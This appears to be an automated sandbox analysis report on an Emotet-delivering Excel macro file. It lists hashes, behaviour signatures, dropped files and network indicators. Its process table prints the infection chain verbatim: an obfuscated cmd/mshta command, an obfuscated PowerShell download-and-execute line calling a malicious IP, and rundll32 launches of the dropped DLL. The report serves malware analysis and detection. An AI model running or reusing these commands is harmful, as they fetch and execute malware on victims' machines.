analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Electronic form.xls

Full analysis: https://app.any.run/tasks/60676626-36bb-47b4-aea9-ca20ca9aafe4
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 24, 2022, 23:44:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros40
opendir
loader
emotet-doc
emotet
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jan 24 20:48:09 2022, Last Saved Time/Date: Mon Jan 24 20:51:47 2022, Security: 0
MD5:

AE02E072045DFDAE78521D24961B7608

SHA1:

8617BC59446A70CE14FD93866B6E9D558E9BBE96

SHA256:

86B6C6E2307EFDDDF79E29235474FC227CAD27B4C0DCD2A7B44785F2A2559074

SSDEEP:

3072:Me+nBqmKk3hbdlylKsgqopeJBWhZFGkE+cMLxAAImxe53lGvFTQ3IzxgdrvxpU0f:z+nBqmKk3hbdlylKsgqopeJBWhZFVE+m

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3104)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3104)
    • Executes PowerShell scripts

      • mshta.exe (PID: 2248)
    • Loads dropped or rewritten executable

      • SearchProtocolHost.exe (PID: 3368)
      • rundll32.exe (PID: 3508)
      • rundll32.exe (PID: 684)
      • rundll32.exe (PID: 2516)
      • rundll32.exe (PID: 4012)
  • SUSPICIOUS

    • Reads default file associations for system extensions

      • SearchProtocolHost.exe (PID: 3368)
      • EXCEL.EXE (PID: 3104)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 576)
    • Checks supported languages

      • mshta.exe (PID: 2248)
      • cmd.exe (PID: 576)
      • powershell.exe (PID: 2972)
      • cmd.exe (PID: 3004)
    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 2248)
    • Reads the computer name

      • mshta.exe (PID: 2248)
      • powershell.exe (PID: 2972)
    • Reads Environment values

      • powershell.exe (PID: 2972)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2972)
      • rundll32.exe (PID: 3508)
    • Drops a file with a compile date too recent

      • powershell.exe (PID: 2972)
      • rundll32.exe (PID: 3508)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2972)
    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 3004)
      • rundll32.exe (PID: 684)
      • rundll32.exe (PID: 2516)
      • rundll32.exe (PID: 3508)
    • Starts itself from another location

      • rundll32.exe (PID: 684)
    • Application launched itself

      • rundll32.exe (PID: 3508)
      • rundll32.exe (PID: 2516)
  • INFO

    • Reads the computer name

      • EXCEL.EXE (PID: 3104)
      • rundll32.exe (PID: 3508)
      • rundll32.exe (PID: 4012)
    • Checks supported languages

      • EXCEL.EXE (PID: 3104)
      • rundll32.exe (PID: 684)
      • rundll32.exe (PID: 3508)
      • rundll32.exe (PID: 2516)
      • rundll32.exe (PID: 4012)
    • Creates files in the user directory

      • EXCEL.EXE (PID: 3104)
    • Reads internet explorer settings

      • mshta.exe (PID: 2248)
    • Checks Windows Trust Settings

      • powershell.exe (PID: 2972)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3104)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

HeadingPairs:
  • Worksheets
  • 2
  • Excel 4.0 Macros
  • 1
TitleOfParts:
  • Time Card
  • Sheet1
  • FFS
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: -
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2022:01:24 20:51:47
CreateDate: 2022:01:24 20:48:09
Software: Microsoft Excel
LastModifiedBy: xXx
Author: xXx
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
10
Malicious processes
5
Suspicious processes
2

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs mshta.exe powershell.exe searchprotocolhost.exe no specs cmd.exe no specs rundll32.exe no specs rundll32.exe rundll32.exe no specs rundll32.exe

Process information

PID
CMD
Path
Indicators
Parent process
3104"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
576cmd /c ms^h^ta ht^tp:/^/0x^b^907d60^7/fe^r/fe7.htmlC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\imm32.dll
2248mshta http://0xb907d607/fer/fe7.htmlC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
2972"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe7.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
3368"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" C:\Windows\system32\SearchProtocolHost.exeSearchIndexer.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft Windows Search Protocol Host
Version:
7.00.7601.24542 (win7sp1_ldr_escrow.191209-2211)
Modules
Images
c:\windows\system32\searchprotocolhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3004"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyStringC:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
684C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyStringC:\Windows\SysWow64\rundll32.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
3508C:\Windows\system32\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServerC:\Windows\system32\rundll32.exe
rundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
2516C:\Windows\system32\rundll32.exe "C:\Users\admin\AppData\Local\Mazzzn\aadgnzwylzrz.qjg",yGAYrVUTcSGrC:\Windows\system32\rundll32.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\lpk.dll
c:\windows\system32\imagehlp.dll
4012C:\Windows\system32\rundll32.exe "C:\Users\admin\AppData\Local\Mazzzn\aadgnzwylzrz.qjg",DllRegisterServerC:\Windows\system32\rundll32.exe
rundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
Total events
3 373
Read events
3 242
Write events
119
Delete events
12

Modification events

(PID) Process:(3104) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName:4;=
Value:
343B3D00200C0000010000000000000000000000
(PID) Process:(3104) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3104) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(3104) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(3104) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(3104) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(3104) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(3104) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(3104) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(3104) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
2
Suspicious files
4
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
3104EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR2B05.tmp.cvr
MD5:
SHA256:
3104EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Electronic form.xls.LNKlnk
MD5:D1C643EA6ED90FA098C1E0205871C301
SHA256:1D72FD3879E19DB433F5B0BBAA83D7CB372AE275664AEBB6E1B32386C14BB3B6
2248mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\fe7[1].htmbinary
MD5:609F432C37632E29A7C054768B5A7A75
SHA256:C6AF32BE73AC371CDAF55B8EB49F2668197009C917054D30FD239E273073DF03
3508rundll32.exeC:\Users\admin\AppData\Local\Mazzzn\aadgnzwylzrz.qjgexecutable
MD5:628B5EA54651D6A8D9F6D442099CCB6F
SHA256:8A7A77B1050DE515440FB333E53B11793A13EC8881A25A0558546CE9A3B5477F
2972powershell.exeC:\Users\Public\Documents\ssd.dllexecutable
MD5:628B5EA54651D6A8D9F6D442099CCB6F
SHA256:8A7A77B1050DE515440FB333E53B11793A13EC8881A25A0558546CE9A3B5477F
2972powershell.exeC:\Users\admin\AppData\Local\Temp\mxvwf23n.juy.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2972powershell.exeC:\Users\admin\AppData\Local\Temp\gi2yd10w.y13.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2972powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:1068BF0B9B98C206F587A7DB05F6DD06
SHA256:534478EDAFC5087DAA3749624454988B1F7DF923BF1A0A9E28C5F97C3308CFDB
3104EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:ED5B02B473DEF381B2ECD12C13538959
SHA256:AE3372ADAE645D4CC3730E77097E74C8CA5196C883CF5F653B446502EBB477F5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
10
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2972
powershell.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe7.png
FR
text
1.06 Kb
malicious
2248
mshta.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe7.html
FR
binary
10.8 Kb
malicious
2972
powershell.exe
GET
200
119.18.48.131:80
http://royallifeagroindia.com/Fox-C/7H/
IN
executable
780 Kb
suspicious
2972
powershell.exe
GET
301
118.27.95.217:80
http://id-tiara.com/well-known/hbPI8/
JP
html
162 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2972
powershell.exe
34.70.177.225:443
wordpress02.aftershipdemo.com
US
unknown
2248
mshta.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
2972
powershell.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
118.27.95.217:80
id-tiara.com
JP
unknown
2972
powershell.exe
118.27.95.217:443
id-tiara.com
JP
unknown
2972
powershell.exe
188.114.97.7:443
leadrise.co
Cloudflare Inc
US
malicious
2972
powershell.exe
119.18.48.131:80
royallifeagroindia.com
SoftLayer Technologies Inc.
IN
suspicious
4012
rundll32.exe
45.80.148.200:443
suspicious

DNS requests

Domain
IP
Reputation
wordpress02.aftershipdemo.com
  • 34.70.177.225
unknown
leadrise.co
  • 188.114.97.7
  • 188.114.96.7
malicious
wordpress08.aftershipdemo.com
  • 34.70.177.225
unknown
id-tiara.com
  • 118.27.95.217
unknown
royallifeagroindia.com
  • 119.18.48.131
suspicious

Threats

PID
Process
Class
Message
2972
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2972
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2972
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info